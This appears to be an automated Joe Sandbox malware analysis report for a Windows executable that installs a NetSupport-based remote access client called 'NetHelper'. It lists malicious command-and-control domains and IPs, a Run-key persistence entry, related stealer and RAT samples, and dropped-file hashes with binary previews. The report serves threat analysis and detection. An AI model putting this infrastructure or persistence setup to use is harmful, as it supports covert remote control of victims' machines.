                                                                  http://geo.netsupportsoftware.com/location/loca.asp-client32.exe, 00000001.00000003.326358193.000000000512A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.323361228.0000000005129000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.327217206.000000000512A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.384862941.0000000005129000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.327017392.0000000005129000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000002.827940603.0000000005129000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.325965285.0000000005129000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.326551349.0000000005129000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.328706032.000000000512A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.323841496.0000000005129000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high

                                                                    World Map of Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public IPs

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    198.54.121.245
                                                                    		mediainfotv.xyzUnited States
                                                                    		22612NAMECHEAP-NETUStrue
                                                                    109.107.178.106
                                                                    		upl0ad3d.comRussian Federation
                                                                    		49973TELEPORT-TV-ASRUtrue
                                                                    51.142.119.24
                                                                    		geography.netsupportsoftware.comUnited Kingdom
                                                                    		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                    82.118.23.50
                                                                    		unknownUkraine
                                                                    		204957GREENFLOID-ASUAfalse

                                                                    Private

                                                                    IP
                                                                    192.168.2.1

                                                                    General Information

                                                                    Joe Sandbox Version:37.0.0 Beryl
                                                                    Analysis ID:831174
                                                                    Start date and time:2023-03-21 07:59:06 +01:00
                                                                    Joe Sandbox Product:CloudBasic
                                                                    Overall analysis duration:0h 14m 0s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                    Number of analysed new started processes analysed:22
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • HDC enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample file name:0ud2VlMOvF.exe
                                                                    Original Sample Name:2db4e85f42ab1b1b22a6829f273566a7.bin.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.rans.troj.spyw.evad.winEXE@26/58@4/5
                                                                    EGA Information:
                                                                    • Successful, ratio: 100%
                                                                    HDC Information:
                                                                    • Successful, ratio: 11.8% (good quality ratio 11.1%)
                                                                    • Quality average: 71.3%
                                                                    • Quality standard deviation: 30.7%
                                                                    HCA Information:Failed
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Override analysis time to 240s for sample files taking high CPU consumption

                                                                    Warnings

                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, GameBar.exe, svchost.exe
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtCreateFile calls found.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    TimeTypeDescription
                                                                    08:00:10AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run NetHelper C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exe
                                                                    08:00:21AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run NetHelper C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exe
                                                                    08:02:47API Interceptor15x Sleep call for process: powershell.exe modified
                                                                    08:02:52API Interceptor1x Sleep call for process: Close.exe.pif modified

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    51.142.119.24Update.jsGet hashmaliciousUnknownBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                    fki6NA6rln.exeGet hashmaliciousUnknownBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                    6pg8dC6lzB.exeGet hashmaliciousUnknownBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                    v8Ur15UAaN.exeGet hashmaliciousUnknownBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                    tigervnc64.exeGet hashmaliciousBabadedaBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                    https://newhopeforjunk.com/new/setup.zipGet hashmaliciousUnknownBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                    AnyDesk.exeGet hashmaliciousUnknownBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                    90729FDB48DF1F5E33CF9DDD2921EE2F102425ECE175E.exeGet hashmaliciousUnknownBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                    ntvsu1CA5t.exeGet hashmaliciousUnknownBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                    et.ps1Get hashmaliciousNetSupport RATBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                    Iun8QAzXtV.exeGet hashmaliciousRedLineBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                    5433_AG.jsGet hashmaliciousNetSupport RATBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                    5250_W.jsGet hashmaliciousNetSupport RATBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                    5403_JQ.jsGet hashmaliciousNetSupport RATBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                    5315_QED.jsGet hashmaliciousNetSupport RATBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                    glavhBINGn.exeGet hashmaliciousUnknownBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                    fp_x86_x64pp_en_en_installfull.zipGet hashmaliciousNetSupport RATBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                    5215_r.jsGet hashmaliciousNetSupport RATBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp

                                                                    Domains

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    geography.netsupportsoftware.cominformation_20_mar.jsGet hashmaliciousNetSupport RATBrowse
                                                                    • 62.172.138.67
                                                                    information_20_mar.jsGet hashmaliciousNetSupport RATBrowse
                                                                    • 62.172.138.67
                                                                    Update.jsGet hashmaliciousUnknownBrowse
                                                                    • 51.142.119.24
                                                                    fki6NA6rln.exeGet hashmaliciousUnknownBrowse
                                                                    • 51.142.119.24
                                                                    6pg8dC6lzB.exeGet hashmaliciousUnknownBrowse
                                                                    • 51.142.119.24
                                                                    v8Ur15UAaN.exeGet hashmaliciousUnknownBrowse
                                                                    • 51.142.119.24
                                                                    f3zhG7Kw8k.exeGet hashmaliciousUnknownBrowse
                                                                    • 62.172.138.67
                                                                    tigervnc64.exeGet hashmaliciousBabadedaBrowse
                                                                    • 51.142.119.24
                                                                    TzEpK9KSLj.exeGet hashmaliciousUnknownBrowse
                                                                    • 62.172.138.67
                                                                    p5tvC44u30.exeGet hashmaliciousUnknownBrowse
                                                                    • 62.172.138.67
                                                                    X4RiCV0B2C.exeGet hashmaliciousBabadedaBrowse
                                                                    • 62.172.138.67
                                                                    https://newhopeforjunk.com/new/setup.zipGet hashmaliciousUnknownBrowse
                                                                    • 51.142.119.24
                                                                    msys2-x86_64-20221028.exeGet hashmaliciousUnknownBrowse
                                                                    • 62.172.138.67
                                                                    OEHzAqVUpm.exeGet hashmaliciousUnknownBrowse
                                                                    • 62.172.138.67
                                                                    AF5DB7DC5193B5170164D0EEACBDC5B9D2AEAFFBBA419.exeGet hashmaliciousUnknownBrowse
                                                                    • 62.172.138.67
                                                                    AnyDesk.exeGet hashmaliciousUnknownBrowse
                                                                    • 51.142.119.24
                                                                    90729FDB48DF1F5E33CF9DDD2921EE2F102425ECE175E.exeGet hashmaliciousUnknownBrowse
                                                                    • 51.142.119.24
                                                                    FT1039.lnkGet hashmaliciousNetSupport RATBrowse
                                                                    • 62.172.138.67
                                                                    Lightshot-setup.exeGet hashmaliciousBabadedaBrowse
                                                                    • 62.172.138.67
                                                                    Lightshot-setup.exeGet hashmaliciousBabadedaBrowse
                                                                    • 62.172.138.67

                                                                    ASNs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    NAMECHEAP-NETUShttps://www.dropbox.com/scl/fi/uyoc0laof4c6j2lbbnolz/Untitled-6.paper?dl=0&rlkey=92eoksfiebq4t7ttstpxcrz4wGet hashmaliciousHTMLPhisherBrowse
                                                                    • 162.0.229.203
                                                                    u8QPnVhq0N.exeGet hashmaliciousFormBookBrowse
                                                                    • 199.192.30.147
                                                                    SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeGet hashmaliciousFormBookBrowse
                                                                    • 199.192.30.147
                                                                    QUOTATION.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    • 199.192.26.35
                                                                    Quotation.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    • 199.192.26.35
                                                                    DHLINV000156.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    • 199.192.30.193
                                                                    DHL_Notification_pdf.exeGet hashmaliciousFormBookBrowse
                                                                    • 162.0.231.77
                                                                    DHL_SHIPPING_DOCUMENT.exeGet hashmaliciousFormBookBrowse
                                                                    • 199.192.28.110
                                                                    OUTSTANDING_PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                    • 192.64.116.162
                                                                    #U8be2#U4ef7.pdf.exeGet hashmaliciousFormBookBrowse
                                                                    • 199.192.28.121
                                                                    VPBK_MT910-BIEN_NHAN_SWIFT_T222930203001KGG-20230320_VND675108044.exeGet hashmaliciousFormBookBrowse
                                                                    • 198.54.115.99
                                                                    IMG_6071220733pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 63.250.35.178
                                                                    DHL_SHIPPING_DOCUMENT.exeGet hashmaliciousFormBookBrowse
                                                                    • 199.192.28.110
                                                                    Encrypted Closing docs and Payoff statements.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                    • 199.192.31.166
                                                                    DHLIN00178.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    • 162.213.255.18
                                                                    New Statement from City of Bisbee.msgGet hashmaliciousHTMLPhisherBrowse
                                                                    • 162.0.229.203
                                                                    Payment Advice Note-25995.htmGet hashmaliciousHTMLPhisherBrowse
                                                                    • 104.219.248.95
                                                                    #Ud83d#Udce7#U2122 Payment Advice Note-20509.htmGet hashmaliciousHTMLPhisherBrowse
                                                                    • 104.219.248.96
                                                                    Aliquid.htmlGet hashmaliciousHtmlDropperBrowse
                                                                    • 198.187.31.120
                                                                    Proforma_Invoice.exeGet hashmaliciousFormBookBrowse
                                                                    • 162.0.236.127
                                                                    TELEPORT-TV-ASRUfile.exeGet hashmaliciousRedLineBrowse
                                                                    • 109.107.191.169
                                                                    file.exeGet hashmaliciousRedLineBrowse
                                                                    • 109.107.191.169
                                                                    file.exeGet hashmaliciousRedLineBrowse
                                                                    • 109.107.191.169
                                                                    excelsetup.batGet hashmaliciousXWormBrowse
                                                                    • 109.107.179.248
                                                                    DoubleClickXtoXDOWNLOAD.oneGet hashmaliciousRedLineBrowse
                                                                    • 109.107.179.248
                                                                    file.exeGet hashmaliciousRedLineBrowse
                                                                    • 109.107.191.169
                                                                    file.exeGet hashmaliciousRedLineBrowse
                                                                    • 109.107.191.169
                                                                    Shipping_Document-one__rw.batGet hashmaliciousAsyncRAT, RedLineBrowse
                                                                    • 109.107.174.128
                                                                    e8bbfe18-3bc2-4d9a-a512-07486eeeff35.batGet hashmaliciousAsyncRATBrowse
                                                                    • 109.107.174.128
                                                                    file.exeGet hashmaliciousTofseeBrowse
                                                                    • 109.107.174.72
                                                                    1edf8210000.exeGet hashmaliciousRedLineBrowse
                                                                    • 109.107.179.248
                                                                    ef2e6594-b82c-48a1-bc72-732893199748.batGet hashmaliciousRedLineBrowse
                                                                    • 109.107.179.248
                                                                    file.exeGet hashmaliciousRedLineBrowse
                                                                    • 109.107.191.169
                                                                    Installer.exeGet hashmaliciousRaccoon Stealer v2Browse
                                                                    • 109.107.173.210
                                                                    file.exeGet hashmaliciousRedLineBrowse
                                                                    • 109.107.191.169
                                                                    file.exeGet hashmaliciousRedLineBrowse
                                                                    • 109.107.191.169
                                                                    file.exeGet hashmaliciousRedLineBrowse
                                                                    • 109.107.191.169
                                                                    Setup.exeGet hashmaliciousRedLineBrowse
                                                                    • 109.107.191.169
                                                                    sP3YqieVpg.exeGet hashmaliciousRedLineBrowse
                                                                    • 109.107.177.164
                                                                    file.exeGet hashmaliciousRedLineBrowse
                                                                    • 109.107.191.169

                                                                    JA3 Fingerprints

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    37f463bf4616ecd445d4a1937da06e19setup.exeGet hashmaliciousAmadey, Djvu, RHADAMANTHYS, SmokeLoader, VidarBrowse
                                                                    • 198.54.121.245
                                                                    file.exeGet hashmaliciousClipboard Hijacker, PrivateLoaderBrowse
                                                                    • 198.54.121.245
                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                    • 198.54.121.245
                                                                    BBVA_REMITANCE_PDF.vbsGet hashmaliciousLokibotBrowse
                                                                    • 198.54.121.245
                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                    • 198.54.121.245
                                                                    setup.exeGet hashmaliciousAmadey, Djvu, RHADAMANTHYS, RedLine, SmokeLoader, VidarBrowse
                                                                    • 198.54.121.245
                                                                    setup.exeGet hashmaliciousAmadey, Clipboard Hijacker, Djvu, RHADAMANTHYS, RedLine, SmokeLoader, VidarBrowse
                                                                    • 198.54.121.245
                                                                    setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                    • 198.54.121.245
                                                                    Doc_2832233887.335561.17564.cmdGet hashmaliciousUnknownBrowse
                                                                    • 198.54.121.245
                                                                    FACT64186.msiGet hashmaliciousUnknownBrowse
                                                                    • 198.54.121.245
                                                                    QUOTATION.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    • 198.54.121.245
                                                                    Quotation.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    • 198.54.121.245
                                                                    Solicitud de presupuesto.exeGet hashmaliciousGuLoaderBrowse
                                                                    • 198.54.121.245
                                                                    Office-AddInHelper.exeGet hashmaliciousAmadeyBrowse
                                                                    • 198.54.121.245
                                                                    setup.exeGet hashmaliciousAmadey, Clipboard Hijacker, Djvu, Fabookie, RHADAMANTHYS, SmokeLoaderBrowse
                                                                    • 198.54.121.245
                                                                    setup.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                                                    • 198.54.121.245
                                                                    Doc_2832233887.335561.17564.lNk.lnkGet hashmaliciousUnknownBrowse
                                                                    • 198.54.121.245
                                                                    setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                    • 198.54.121.245
                                                                    setup.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                                                    • 198.54.121.245
                                                                    setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                    • 198.54.121.245

                                                                    Dropped Files

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    C:\Users\user\AppData\Local\Temp\rrrr.exess-kids.apkGet hashmaliciousUnknownBrowse
                                                                      bet365_Sports_Betting_v8.0.2.305-us_www.9apps.com_.apkGet hashmaliciousUnknownBrowse
                                                                        .apkGet hashmaliciousUnknownBrowse
                                                                          XX7TX56y61.exeGet hashmaliciousUnknownBrowse
                                                                            ss-kids.apkGet hashmaliciousUnknownBrowse
                                                                              kurulum.apkGet hashmaliciousUnknownBrowse
                                                                                APT-C-23Get hashmaliciousUnknownBrowse
                                                                                  Gg13vDczsm.exeGet hashmaliciousUnknownBrowse
                                                                                    Gg13vDczsm.exeGet hashmaliciousUnknownBrowse
                                                                                      .apkGet hashmaliciousUnknownBrowse
                                                                                        .apkGet hashmaliciousUnknownBrowse
                                                                                          app.apkGet hashmaliciousUnknownBrowse
                                                                                            Servizio Pubblico_co.mosai.mondonuovo_1.0.0_base.apkGet hashmaliciousUnknownBrowse
                                                                                              Speedy_Services_v5.0.12_www.9apps.com_.apkGet hashmaliciousUnknownBrowse
                                                                                                cqe4Tj8Pgb.exeGet hashmaliciousUnknownBrowse
                                                                                                  SecuriteInfo.com.Trojan.GenericKD.65537617.16965.5294.exeGet hashmaliciousUnknownBrowse
                                                                                                    SecuriteInfo.com.Trojan.GenericKD.65537617.16965.5294.exeGet hashmaliciousUnknownBrowse
                                                                                                      .apkGet hashmaliciousUnknownBrowse
                                                                                                        5NYUKHPofP.apkGet hashmaliciousUnknownBrowse
                                                                                                          aplicativo.apkGet hashmaliciousUnknownBrowse
                                                                                                            C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pif0HYSKx2lH0.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                              0HYSKx2lH0.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                SecuriteInfo.com.Win32.Malware-gen.3518.18422.exeGet hashmaliciousRedLineBrowse
                                                                                                                  1NHx8w5m6F.exeGet hashmaliciousRedLineBrowse
                                                                                                                    sZCgzJsxWX.exeGet hashmaliciousRedLineBrowse
                                                                                                                      sZCgzJsxWX.exeGet hashmaliciousUnknownBrowse

                                                                                                                        Created / dropped Files

                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\nesup3[1].zip

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\0ud2VlMOvF.exe
                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):2265919
                                                                                                                        Entropy (8bit):7.9973398491864245
                                                                                                                        Encrypted:true
                                                                                                                        SSDEEP:49152:C1ZlDlEDThXBJOhHDn6J6h2SFFGf0RBNTQfYc9jh23eWeB3/YSBm7WIqR0ZkTS6A:C1qFXaRhRFY89YYc9jh23redpmQRNA
                                                                                                                        MD5:0DE7714C930DA43E7F687E31C34B0E89
                                                                                                                        SHA1:AC0C59FFD0BEE0DC5C715805303A01CBCB72B8FA
                                                                                                                        SHA-256:2A575A3C0360A79A2851474F687980547B856C409BF659022F46B58C009A8E59
                                                                                                                        SHA-512:1EDEE550767A931B1684793BF5A7C86D51C4CE99FFE5CD4EE99D4ECE8B7B6B940CCDEC2BF2B8BCA37DF95F9247343C1BD6C25BA1D33CFD3C35292E5E7C5A94F5
                                                                                                                        Malicious:false
                                                                                                                        Preview:PK........{X.I.p......x.......HTCTL32.DLL.:mp.U..3=I'.....J.X.{..i^= ..a...f.2.~L..5...b..>"....M...kQ..X.-.vk.Zk..q&.M.."VI.KPW..."D.dL.so.|%.pw.........}.9.....M...(..t...).......%..R....^.....>^...>.v....~.G..{.+]+=R..#.KV4.>....L)....]:........_}..@.........H.M}{H;..i..}?..2.|..?xo3....e..:.q.'...."......O.}_.i.(.2=q%O..F.3.R..A..o..*..a.dk4.O3........I.CU^...z.l...PT..P3..A?3nN.*`...L..I..W.n5..2.8....l...j.B..IuA.5...*3.w....o..O0...ek._{/E....Xh.N..*[{.C...=7.>..B...x.R....O#:..g=H...-.....7..xQ+o.U......T....Y(.........h.........O..)J.......].,n-n.g ...>k2...8.=....FV.4p.[..1k..K....)N.<FK..8..g|d......|....akX..H...8....Bt42.W....Ei........V{.r.=x....m..9.I.*...V9.r.i.u....l.)b.....n@>.1.+. J..K.iu9......n.K.......Y....E.3..|.....}B..JP......]..m.a`...m1 y.........y.2bU.R\.mc\H.6..\.:.z..F>.+z.."...N...y>...-...AN.[..+.Y._..|..#.2.U.cZ. .a.............h..K..../..f0=.#....v..OE....d.....zQ]1j.....v......M)F.". ...J...

                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\loca[1].htm

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):15
                                                                                                                        Entropy (8bit):2.8402239289418514
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:yAcn:yV
                                                                                                                        MD5:020DF0663B4F5741AD652976C4207B0B
                                                                                                                        SHA1:50AAA69D3EA68A7B16AA8FCBD866A6598EC39392
                                                                                                                        SHA-256:0B4688799BA0DF92A3730B63635CC57F19DF94357AE63850AB96771A5711A3E1
                                                                                                                        SHA-512:A6CA0A74AC46AB3A42B61A534BD97D167DF6900627E9076D75C40744D9B87EF71C26C9D8C797D5B410BFEF8A7805B87DE81CCC9BB76743B69678C083E3B07AE9
                                                                                                                        Malicious:false
                                                                                                                        Preview:47.1772,8.42719

                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\rr[1].zip

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\0ud2VlMOvF.exe
                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):2804064
                                                                                                                        Entropy (8bit):5.247601251829904
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24576:EXSDdddEkBwWjeob4i2BXa5aXKKsTXE67dg8wwarcTu+ow9GD3RSNsoXr5MSa:EidHBwhob4rBAl0IsFrcTzwVSyoXna
                                                                                                                        MD5:6CDF0F9D9B1B3E686841B55AFC69D282
                                                                                                                        SHA1:425EDCA1B9511DCAB0706D8BF24A3D5498E4C8E8
                                                                                                                        SHA-256:D10C724B5C2F715D73D082CC744BE45771B97676B6EB70C7BCC677CD356386A7
                                                                                                                        SHA-512:B59A30AB8D6B2738AF121A7E7023B5A1FB6EEC206122DEF1F9DB9D735B29D98384DA5FB11ABED8DA8679152F9CBB4C2B16918EB39DFE5C3BF2F984B62FFB7051
                                                                                                                        Malicious:false
                                                                                                                        Preview:PK........#.rV`R.F..*.{v.P....rrrr.exe..\...8...XpuWE..Z;.j.V*X.e./.*.W4/ ....^..Z(^.-..9u.i.9.n........%.).%...R.......ywY.N..}....bg.<..33.<...3...R.....$I.*...(.(..?. .........-..i..RV6;ken...+r...[m..-.......Y...6g.......5...R....NH.<m..........2/.u.....3..N1.....2g...=i..i)).........C..I..)4............Q(o...e..as._.....:.D....W.Py?..W.3W/xBz..).q...Z......Pn.~..C)...._.....yIr...TF....M....>..u.@a..'...#.%.....@._....cV._bY".:C...L...XV._.?.r|.u..px!2-...~..<&'c..e..%..Vp..^...L....2...L.+ L.].o....Zo...S,9+...7....."-.B;.u._'.Q.{.^......_...K.3.Y..;....C....>-..d.Lv.....-.......k..wew....*...........;[v.;Mv.d7Av........8..]...... ..e7BvG....507.V.. .l.gI..$.F),~...."..V....i..<...".....]..jdW..H...8N..'X'd%..B.@_..H]q../.h.s.)H *..F5.*..P.&7.!.....rk;.'zq0.-...v"\r.4...T.C.D..f.IS.f-.(..j1N-....gV...$.T.A.....3%mN.L..l ...Dm.. ...&.Pn.F.......'}.....$^.HT........k_.{..a09..:.1...A`...r...../Z..U.I.."w...u.3..5.....nX..a.

                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                        Download File
                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):18488
                                                                                                                        Entropy (8bit):5.563638763045271
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:384:Zt9kXuqIKGSK0jZz0jMSBxkMilXI2aiXQdZvuSneFIGH:otjhj4xhilXJEZmucIE
                                                                                                                        MD5:67E20B77BD02656F6AA74463B081237A
                                                                                                                        SHA1:BD98147523CD34E0B3815F2510672261F9185C03
                                                                                                                        SHA-256:1A2C3BC45212721D55438CCAAEA54EB9B98ADC7E5801F33E8E5011B2FA9AA50E
                                                                                                                        SHA-512:98A2317954C8D4852DBF3269A7FE9655008C21DF87652688E3FB5E65DF1C41EFAC3A0025ED4000BD7FD13E1D5538EC753CE1999BB7C879CFAB2042117961932C
                                                                                                                        Malicious:false
                                                                                                                        Preview:@...e...........................................................H...............<@.^.L."My...:=..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)U.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD..................-.D.F.<;.nt.1........System.Configuration.Ins

                                                                                                                        C:\Users\user\AppData\Local\Temp\38.zip

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\0ud2VlMOvF.exe
                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):2804064
                                                                                                                        Entropy (8bit):5.247601251829904
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24576:EXSDdddEkBwWjeob4i2BXa5aXKKsTXE67dg8wwarcTu+ow9GD3RSNsoXr5MSa:EidHBwhob4rBAl0IsFrcTzwVSyoXna
                                                                                                                        MD5:6CDF0F9D9B1B3E686841B55AFC69D282
                                                                                                                        SHA1:425EDCA1B9511DCAB0706D8BF24A3D5498E4C8E8
                                                                                                                        SHA-256:D10C724B5C2F715D73D082CC744BE45771B97676B6EB70C7BCC677CD356386A7
                                                                                                                        SHA-512:B59A30AB8D6B2738AF121A7E7023B5A1FB6EEC206122DEF1F9DB9D735B29D98384DA5FB11ABED8DA8679152F9CBB4C2B16918EB39DFE5C3BF2F984B62FFB7051
                                                                                                                        Malicious:false
                                                                                                                        Preview:PK........#.rV`R.F..*.{v.P....rrrr.exe..\...8...XpuWE..Z;.j.V*X.e./.*.W4/ ....^..Z(^.-..9u.i.9.n........%.).%...R.......ywY.N..}....bg.<..33.<...3...R.....$I.*...(.(..?. .........-..i..RV6;ken...+r...[m..-.......Y...6g.......5...R....NH.<m..........2/.u.....3..N1.....2g...=i..i)).........C..I..)4............Q(o...e..as._.....:.D....W.Py?..W.3W/xBz..).q...Z......Pn.~..C)...._.....yIr...TF....M....>..u.@a..'...#.%.....@._....cV._bY".:C...L...XV._.?.r|.u..px!2-...~..<&'c..e..%..Vp..^...L....2...L.+ L.].o....Zo...S,9+...7....."-.B;.u._'.Q.{.^......_...K.3.Y..;....C....>-..d.Lv.....-.......k..wew....*...........;[v.;Mv.d7Av........8..]...... ..e7BvG....507.V.. .l.gI..$.F),~...."..V....i..<...".....]..jdW..H...8N..'X'd%..B.@_..H]q../.h.s.)H *..F5.*..P.&7.!.....rk;.'zq0.-...v"\r.4...T.C.D..f.IS.f-.(..j1N-....gV...$.T.A.....3%mN.L..l ...Dm.. ...&.Pn.F.......'}.....$^.HT........k_.{..a09..:.1...A`...r...../Z..U.I.."w...u.3..5.....nX..a.

                                                                                                                        C:\Users\user\AppData\Local\Temp\SETUP_44067\00000#Andrew

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\rrrr.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):112640
                                                                                                                        Entropy (8bit):6.492791018363647
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3072:Drds/gNGhFcU+IbXCyZJXXxmJ2sL+gYUUOp+ZFA9py+U/KkN:zNGhF0yVmJZYUUOp+yI9b
                                                                                                                        MD5:12B091B9B8AB58EB24B3E221AC1BC977
                                                                                                                        SHA1:6011E0C00338F9484DE488F21E7C8EAA1FBAC527
                                                                                                                        SHA-256:A2F5BDC7FD73557D3C1C2C65920C77CC6405BB763DFE2BE17E7EEA4B55D0A01F
